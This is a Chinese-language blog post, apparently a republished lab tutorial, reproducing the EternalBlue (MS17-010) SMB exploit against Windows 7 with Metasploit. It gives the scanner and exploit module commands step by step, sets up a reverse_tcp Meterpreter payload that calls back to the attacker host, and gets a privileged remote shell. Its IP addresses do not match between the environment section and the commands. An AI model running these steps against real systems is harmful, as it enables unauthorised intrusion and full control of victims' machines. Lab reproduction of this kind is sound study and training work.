永恒之蓝漏洞利用

Posted n-schema

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了永恒之蓝漏洞利用相关的知识,希望对你有一定的参考价值。

漏洞介绍:永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

 

实验环境:

攻击机:192.168.0.134(kali2019 Metaploit工具)

靶机:192.168.0.111 (win7 x64)

 

漏洞利用:

1.扫描漏洞
在kali终端中输入msfconsole
msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)
msf >set RHOSTS 10.101.2.11(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)
 技术图片

上图可知,可能存在MS17-010

 2.漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

 技术图片

 show options(查看配置相关信息)

 技术图片

meterpreter >run(开始攻击)

 技术图片

 

 sysinfo爆出系统信息

技术图片

 

 meterpreter >shell,进入靶机cmd

技术图片

 

 反弹shell成功

技术图片

 

 可以发现最高权限

 

以上是关于永恒之蓝漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章

利用虚拟机复现漏洞 “永恒之蓝”

永恒之蓝漏洞利用

Eternal Blue永恒之蓝漏洞利用--洪水猛兽

EternalBlue永恒之蓝漏洞复现

一个利用“永恒之蓝”漏洞传播的挖矿程序分析

ms17-010永恒之蓝漏洞验证与利用